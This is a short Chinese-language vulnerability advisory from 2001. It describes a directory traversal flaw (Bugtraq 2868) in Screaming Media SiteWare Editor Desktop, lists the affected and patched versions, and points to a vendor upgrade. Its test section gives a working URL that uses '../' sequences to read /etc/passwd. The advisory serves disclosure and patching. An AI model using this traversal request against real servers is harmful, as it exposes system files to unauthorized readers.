发布日期：2001-06-14
更新日期：2001-06-18

受影响系统：

Screaming Media SiteWare 3.1
Screaming Media SiteWare 3.02
Screaming Media SiteWare 3.01
Screaming Media SiteWare 3.0
Screaming Media SiteWare 2.501
Screaming Media SiteWare 2.5

不受影响系统：

Screaming Media SiteWare 3.1.1
Screaming Media SiteWare 2.5.1

描述：

---

BUGTRAQ ID ： 2868

Screaming Media是一个定制网站内容的提供商，而SiteWare Editor Desktop则是基于
web的Screaming Media内容管理工具。

由于没有过滤用户提交请求中的“../”，导致SiteWare Editor Desktop存在目录遍历
漏洞，进一步导致泄露任意文件。

<*来源：Foundstone Labs (abs@foundstone.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Foundstone Labs (abs@foundstone.com)提供了如下测试代码：

http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template
=../../../../../../../etc/passwd



建议：

---

厂商补丁：

提供商已经发布了一个免费软件升级来解决这个问题，请通过下面的地址联系：
support@screamingmedia.com
厂商主页：http://www.screamingmedia.com


浏览次数：3718
严重程度：0（网友投票）